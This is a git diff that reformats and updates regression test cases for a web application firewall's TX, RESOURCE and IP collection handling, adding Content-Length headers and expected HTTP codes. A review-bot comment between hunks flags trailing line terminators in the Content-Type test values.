@@ -60,58 +61,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - 
"body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:id_a with value: nops", - "http_code":403 + "expected": { + "debug_log": "Saving variable: IP:id_a with value: nops", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:11,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:12,phase:2,t:lowercase,setvar:IP.id_a=nops\"", diff --git a/test/test-cases/regression/collection-resource.json b/test/test-cases/regression/collection-resource.json index b73d00cb14..c89ba570c8 100644 --- a/test/test-cases/regression/collection-resource.json +++ b/test/test-cases/regression/collection-resource.json 
@@ -1,49 +1,52 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - 
"audit_log":"", - "debug_log":"Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,setvar:resource.test=123,id:900000\"", 
@@ -52,50 +55,53 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "body":[ + "body": [ + "" ] }, - 
"expected":{ - "audit_log":"", - "debug_log":"RESOURCE:whee::webappid::test", - "error_log":"" + "expected": { + "debug_log": "RESOURCE:whee::webappid::test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecWebAppId webappid", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", diff --git a/test/test-cases/regression/collection-tx-with-macro.json b/test/test-cases/regression/collection-tx-with-macro.json index a0173b6bb6..7ceafcbe8f 100644 --- a/test/test-cases/regression/collection-tx-with-macro.json +++ b/test/test-cases/regression/collection-tx-with-macro.json 
@@ -1,173 +1,179 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": 
"384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": 
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 
3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"310\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { 
+ "debug_log": "Target value: \"310\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Keep-Alive}%\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
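Review bot: The response `Content-Type` value on the new side still ends in a line terminator (`"Content-Type": "text/xml; charset=utf-8\n\r"`), although this hunk normalises the sibling header from `"Content-Length":"length\n\r"` to a plain `"384"`. If the harness passes header values through unchanged, any rule that inspects the response headers sees those trailing bytes as part of the value, and they arrive in `\n\r` order rather than CRLF. If they are not intentional, use `"Content-Type": "text/xml; charset=utf-8",` in all three cases of this hunk. If the case is meant to exercise header values with embedded terminators, say so in its `title`. The same value is kept in the `@@ -175,58 +181,60 @@` hunk of this file, in the hunk just before this file's header, and in the collection-tx.json hunks, where the first case ends in `\n` only.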
@@ -175,58 +181,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + 
"Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"5\" \\(Variable: TX:something_else\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"5\" \\(Variable: TX:something_else\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something_else=%{tx.something}%\"", diff --git a/test/test-cases/regression/collection-tx.json b/test/test-cases/regression/collection-tx.json index 07099405f7..587fb33053 100644 --- a/test/test-cases/regression/collection-tx.json +++ b/test/test-cases/regression/collection-tx.json 
@@ -1,212 +1,222 @@ [ - { + { "enabled": 1, - "version_min":300000, - "version_max":0, - "title":"Collection :: TX full vs partial match", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "version_min": 300000, + "version_max": 0, + "title": "Collection :: TX full vs partial match", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Content-Length": "0" }, - "uri":"/", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text/xml; charset=utf-8\n" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n", + "Content-Length": "39" }, - "body":[ + "body": [ "\n" ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@unconditionalMatch\" \"id:1,deny,setvar:TX.partial_match=1,chain\"", "SecRule TX.partial \"@gt 0\" \"id:2,t:lowercase,t:none,status:444\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 
3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"to_test\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"to_test\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" 
\"id:1,t:lowercase,t:none,setvar:TX.something=to_test\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + 
"Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": 